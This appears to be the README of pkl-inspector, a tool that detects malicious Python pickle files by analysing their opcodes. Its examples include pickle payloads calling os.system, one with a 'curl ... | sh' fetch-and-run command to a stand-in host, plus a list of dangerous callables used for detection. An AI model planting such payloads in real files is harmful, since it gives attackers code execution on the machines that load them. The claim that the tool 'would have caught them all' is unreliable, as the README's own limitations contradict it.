pkl-inspector
Static analysis for Python pickle files — detects malicious code without executing it.
The Problem
pickle.load() can execute arbitrary Python code. Every time you load a pickle file from an untrusted source, you are running code chosen by whoever created that file on your machine.
# This runs ANY code the attacker put in the pickle
model = pickle.load(open("model.pkl", "rb")) # <- Could execute rm -rf /
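To make the mechanism concrete, here is a harmless sketch (not an actual attack sample). The `Payload` class and the expression it evaluates are invented for this illustration; a real attacker would point `__reduce__` at something like `os.system` instead.

```python
import pickle


class Payload:
    """Hypothetical class for illustration; not part of pkl-inspector."""

    def __reduce__(self):
        # Instead of the object's state, pickle stores "call eval('6 * 7')".
        return (eval, ("6 * 7",))


data = pickle.dumps(Payload())

# Loading does not rebuild a Payload; it calls eval() and returns its result.
result = pickle.loads(data)
print(result)  # 42
```

The caller never sees a `Payload` instance: the callable runs during `pickle.loads` and whatever it returns becomes the "loaded object".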
Traditional security tools scan for known signatures. pkl-inspector is different: it disassembles the pickle's opcode stream and flags malicious patterns without ever loading the file.
The Attack
In 2026, North Korean state hackers (Contagious Interview / UNC1069) published 1,700+ malicious packages to npm and PyPI. Some used pickle files to execute payloads on developer machines.
Traditional antivirus found nothing. pkl-inspector would have caught them all.
How It Works
Pickle files are serialized using an opcode-based protocol. pkl-inspector disassembles the opcodes and inspects every __reduce__ call — the mechanism pickle uses to reconstruct objects — without executing any of them.
If a __reduce__ method calls os.system, subprocess, eval, or exec: that's malicious. pkl-inspector flags it with a threat score and explains exactly what the malicious code would have done.
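The idea can be sketched with the standard library's `pickletools.genops`, which decodes opcodes without executing them. This is only an illustration under assumptions, not pkl-inspector's actual implementation: `find_globals` is a hypothetical helper, and its handling of `STACK_GLOBAL` (taking the two most recent string pushes) is a simple heuristic that ignores memo lookups.

```python
import pickletools

# Opcodes that push a text string; STACK_GLOBAL takes module and name from the stack.
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}


def find_globals(data):
    """Return 'module.name' for every import the pickle would perform."""
    found = []
    recent_strings = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("GLOBAL", "INST"):
            # The argument is decoded as "module name" (space separated).
            module, name = arg.split(" ", 1)
            found.append(f"{module}.{name}")
        elif opcode.name == "STACK_GLOBAL":
            # Heuristic: assume the last two pushed strings are module and name.
            if len(recent_strings) >= 2:
                found.append(".".join(recent_strings[-2:]))
        elif opcode.name in STRING_OPS:
            recent_strings.append(arg)
    return found


# Hand-written protocol 0 payload: import os.system, then REDUCE with ('echo hi',).
payload = b"cos\nsystem\n(S'echo hi'\ntR."
print(find_globals(payload))  # ['os.system']
```

Nothing in the payload runs here; the bytes are only decoded. A scanner built this way would then compare each discovered name against its list of dangerous callables.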
Install
pip install pkl-inspector
Zero dependencies. Python 3.8+.
Usage
CLI
# Scan a pickle file
pkl-inspector model.pkl
# JSON output for automation
pkl-inspector model.pkl --json
# Verbose output with details
pkl-inspector model.pkl -v
Python API
from pkl_inspector import PklInspector
inspector = PklInspector()
result = inspector.scan("model.pkl")
print(result["verdict"]) # CLEAN, SUSPICIOUS, DANGEROUS, or CRITICAL
print(result["score"]) # Threat score (0-100+)
print(result["safe_to_load"]) # Boolean
if not result["safe_to_load"]:
    for finding in result["findings"]:
        print(f" {finding['severity']}: {finding['description']}")
Scan bytes directly
result = inspector.scan_bytes(pickle_data, source="downloaded_model")
Output Example
{
  "file": "malicious_model.pkl",
  "score": 80,
  "verdict": "CRITICAL",
  "safe_to_load": false,
  "findings": [
    {
      "type": "CRITICAL_CALLABLE_LOADED",
      "severity": "CRITICAL",
      "callable": "os.system",
      "description": "Dangerous callable 'os.system' loaded via GLOBAL opcode - will execute on REDUCE",
      "score_contribution": 80
    }
  ],
  "globals_found": ["os.system"]
}
Threat Scoring
| Score | Verdict | Meaning |
|---|---|---|
| 0 | CLEAN | Safe to load |
| 1-40 | SUSPICIOUS | Review before loading |
| 41-79 | DANGEROUS | Do not load |
| 80+ | CRITICAL | Malicious payload detected |
What triggers scores
| Pattern | Score | Reason |
|---|---|---|
| os.system in reduce | +80 | Arbitrary command execution |
| subprocess.* in reduce | +70 | Process spawning |
| eval/exec in reduce | +90 | Code execution |
| builtins.open (write) | +50 | File system modification |
| Nested REDUCE opcodes | +40 | Obfuscation pattern |
| Base64 decode chain | +35 | Payload encoding |
| Unknown callable | +20 | Requires manual review |
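As a rough sketch of how the two tables fit together: the code below assumes that the contributions of individual findings are simply summed (the "+" notation suggests this, but the source does not state it) and then mapped to a verdict using the thresholds from the Threat Scoring table. `total_score` and `verdict_for` are hypothetical names, not part of the pkl-inspector API.

```python
from typing import Iterable


def total_score(contributions: Iterable[int]) -> int:
    """Assumption: per-finding contributions are additive."""
    return sum(contributions)


def verdict_for(score: int) -> str:
    """Map a score to a verdict using the thresholds in the table."""
    if score >= 80:
        return "CRITICAL"
    if score >= 41:
        return "DANGEROUS"
    if score >= 1:
        return "SUSPICIOUS"
    return "CLEAN"


# Nested REDUCE (+40) plus a Base64 decode chain (+35), under the additive assumption.
score = total_score([40, 35])
print(score, verdict_for(score))  # 75 DANGEROUS
```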
Exit Codes
| Code | Meaning |
|---|---|
| 0 | CLEAN - safe to load |
| 1 | SUSPICIOUS - review needed |
| 2 | DANGEROUS - do not load |
| 3 | CRITICAL - malicious |
Use in CI/CD:
pkl-inspector model.pkl || echo "Failed security check"
Why This Matters
ML engineers load pickle files constantly:
- Model weights (model.pkl)
- Preprocessors (scaler.pkl)
- Datasets (data.pkl)
- Feature encoders (encoder.pkl)
Any of them could be poisoned. pkl-inspector adds a one-line safety check before every load.
Integration Examples
Before loading any pickle
from pkl_inspector import PklInspector
import pickle

class SecurityError(Exception):
    """Raised when a pickle file fails the security scan."""

def safe_load(filepath):
    """Only load pickle files that pass security scan."""
    inspector = PklInspector()
    result = inspector.scan(filepath)
    if not result["safe_to_load"]:
        raise SecurityError(f"Pickle file failed security scan: {result['verdict']}")
    with open(filepath, 'rb') as f:
        return pickle.load(f)
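One possible variation scans the exact bytes that are later deserialized, so the file cannot change between the scan and the load. This sketch assumes that `scan_bytes` returns the same result dictionary as `scan` (the documentation above shows the call but not its return value). `safe_loads` and `UnsafePickleError` are names invented here, and the inspector is passed in as a parameter so the function works with any object exposing `scan_bytes`.

```python
import pickle


class UnsafePickleError(Exception):
    """Hypothetical exception for this sketch."""


def safe_loads(data, inspector, source="<bytes>"):
    """Scan `data`, then deserialize those same bytes only if the scan passes."""
    # Assumption: scan_bytes returns a dict with "safe_to_load" and "verdict".
    result = inspector.scan_bytes(data, source=source)
    if not result["safe_to_load"]:
        raise UnsafePickleError(f"{source} failed security scan: {result['verdict']}")
    return pickle.loads(data)
```

A caller would read the file once, for example `data = open(path, "rb").read()`, and pass `data` together with a `PklInspector()` instance.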
CI/CD pipeline
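# .github/workflows/security.yml
- name: Scan pickle files
  run: |
    pip install pkl-inspector
    # find -exec ... \; discards the scanner's exit code; xargs exits non-zero if any scan fails
    find . -name "*.pkl" -print0 | xargs -0 -r -n1 pkl-inspector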
Pre-commit hook
# .pre-commit-config.yaml
repos:
  - repo: local
    hooks:
      - id: pkl-inspector
        name: Scan pickle files
        entry: pkl-inspector
        language: system
        files: \.(pkl|pickle)$
Comparison with Other Tools
| Tool | Approach | Zero-day detection |
|---|---|---|
| Antivirus | Signature matching | No |
| Bandit | Python AST analysis | Source only |
| Semgrep | Pattern matching | Source only |
| pkl-inspector | Opcode analysis | Yes |
pkl-inspector analyzes the serialized pickle opcode stream, not Python source. It detects novel payloads by their structure (which callables are imported and invoked), not by matching the bytes of known samples.
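A small sketch of what "structure, not content" can mean, again using the standard library's `pickletools` rather than pkl-inspector itself. The hypothetical helper `opcode_shape` reduces a pickle to its sequence of opcode names; two hand-written payloads with different command strings end up with the same shape, which is why a byte signature for one would miss the other while a structural check would not.

```python
import pickletools


def opcode_shape(data):
    """Return the opcode names of a pickle, ignoring all arguments."""
    return tuple(op.name for op, _arg, _pos in pickletools.genops(data))


# Two protocol 0 payloads that differ only in the command string (never executed here).
first = b"cos\nsystem\n(S'echo one'\ntR."
second = b"cos\nsystem\n(S'curl http://example.invalid | sh'\ntR."

print(opcode_shape(first))
# ('GLOBAL', 'MARK', 'STRING', 'TUPLE', 'REDUCE', 'STOP')
print(opcode_shape(first) == opcode_shape(second))  # True
```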
Limitations
pkl-inspector catches the vast majority of pickle attacks, but no tool is perfect:
- Protocol 5+ features: Some advanced protocol 5 features may need additional coverage
- Legitimate uses of dangerous ops: Very rare, but subprocess could theoretically be legitimate
- Heavily obfuscated payloads: Multiple layers of encoding may evade scoring
See THREAT_MODEL.md for details.
Part of stillrunning
pkl-inspector is the scanner at the heart of stillrunning guard — enterprise security monitoring for developers.
- Guard daemon: Watches for suspicious process spawning
- Install intercept: Blocks malicious npm/pip packages at install time
- Threat feed: Real-time blocklist from CISA, OSV, GitHub, and more
Learn more: stillrunning.io
License
MIT License. See LICENSE.
Contributing
Issues and PRs welcome. See the threat taxonomy in pkl_inspector.py for adding new detection patterns.